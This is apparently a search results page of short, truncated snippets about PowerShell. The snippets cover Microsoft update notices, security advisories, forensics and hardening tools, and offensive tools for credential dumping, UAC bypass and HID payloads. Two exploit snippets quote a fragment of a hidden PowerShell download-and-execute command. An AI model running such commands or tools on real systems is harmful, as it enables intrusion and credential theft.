3059 matches found
Cumulative update for Windows 10 Version 1607: August 23, 2016
Cumulative update for Windows 10 Version 1607: August 23, 2016 Summary This update includes improvements and fixes in the functionality of Windows 10 Version 1607. Windows 10 updates are cumulative. Therefore, this package contains all previously released fixes. If you have installed earlier...
Update Rollup 9 for System Center 2012 R2 Virtual Machine Manager
Update Rollup 9 for System Center 2012 R2 Virtual Machine Manager Introduction This article describes the issues that are fixed in Update Rollup 9 for Microsoft System Center 2012 R2 Virtual Machine Manager. There are three updates available for System Center 2012 R2 Virtual Machine Manager: one...
An update is available for System Center Advisor: May 2012
An update is available for System Center Advisor: May 2012 Summary Microsoft has released the on-premises client Update Rollup 1 for Microsoft System Center Advisor. This update is dated May 22, 2012. This article describes the following information about the update: The issues that the update...
Cumulative Update for Windows Server 2016: September 26, 2016
Cumulative Update for Windows Server 2016: September 26, 2016 Summary This update includes improvements and fixes to enhance the functionality of Windows Server 2016. Known issues in this update Issue The installation of this update KB3192366 fails if the RSAT-RemoteAccess-Powershell feature is...
Exploit the Credentials Present in Files and Memory: PowerMemory
PowerMemory is a PowerShell post-exploitation tool. It uses Microsoft binaries and therefore is able to execute on a machine, even after the Device Guard Policies have been set. In the same way, it will bypass antivirus detection. PowerMemory can retrieve credentials information and manipulate...
Windows 'Run As' Using Powershell
This module will start a process as another user using powershell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows 'Run As' Using Powershell', 'Description' = %q This module will start...
Microsoft PowerShell XML External Entity Injection Vulnerability
Microsoft PowerShell is a command line scripting environment that runs on windows machines to automate system and application management. An XML external entity injection vulnerability exists in Microsoft PowerShell, which can be exploited by an attacker to obtain sensitive information and execut...
Alcatel Lucent Omnivista 8770 Remote Code Execution(CVE-2016-9796)
No description provided by source. import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...
Microsoft PowerShell - XML External Entity Injection
Microsoft PowerShell - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product:...
Microsoft PowerShell XXE Injection
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows...
Microsoft PowerShell - XML External Entity Injection Vulnerability
Exploit for windows platform in category local exploits + Credits: John Page aka hyp3rlinx Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows PowerShell and PowerShell Core is a task automation and configuration management framework from...
Microsoft PowerShell - XML External Entity Injection
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows...
WinAPI User Hunter: hunter
WinAPI User Hunter During Red Team engagements it is common to track/hunt specific users. Assuming we already have access to a desktop as a normal user no matter how, always “assume compromise” in a Windows Domain and we want to spread laterally. We want to know where the user is logged on, if he...
Alcatel Lucent Omnivista 8770 Remote Code Execution
import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...
Windows Escalate UAC Protection Bypass
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule 'Windows Escalate UAC Protection Bypass Via Eventvwr Regist...
Windows Anti Recon Tool: SAMRi10
Windows Anti Recon Tool “SAMRi10” tool is a short PowerShell PS script which alters remote SAM access default permissions on Windows 10 & Windows Server 2016. This hardening process prevents attackers from easily getting some valuable recon information to move laterally within their victim’s...
Human Interface Device Exploit Deployment: Brutal
Human Interface Device Exploit Deployment Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device Payload Teensy . Extremely useful for executing scripts on a target machine without the need for human-to-keyboard...
Brutal - Toolkit to quickly create various Payload, PowerShell Attack, Virus Attack and Launch Listener for a HID
Brutal is extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction HID -ATTACK .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of...
PowerShell Digital Forensics: PowerForensics
PowerShell Digital Forensics The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems, and work has begun on Extended File System and HFS+ support. PowerForensics is built on a C Class...
Nymaim Dropper Updates Delivery, Obfuscation Methods
A new variant of the Nymaim dropper has been identified that includes updated delivery and obfuscation methods, and the use of PowerShell routines to download its payloads. The updated dropper, used primarily to download banking Trojans in the past, has also been spreading ransomware, according t...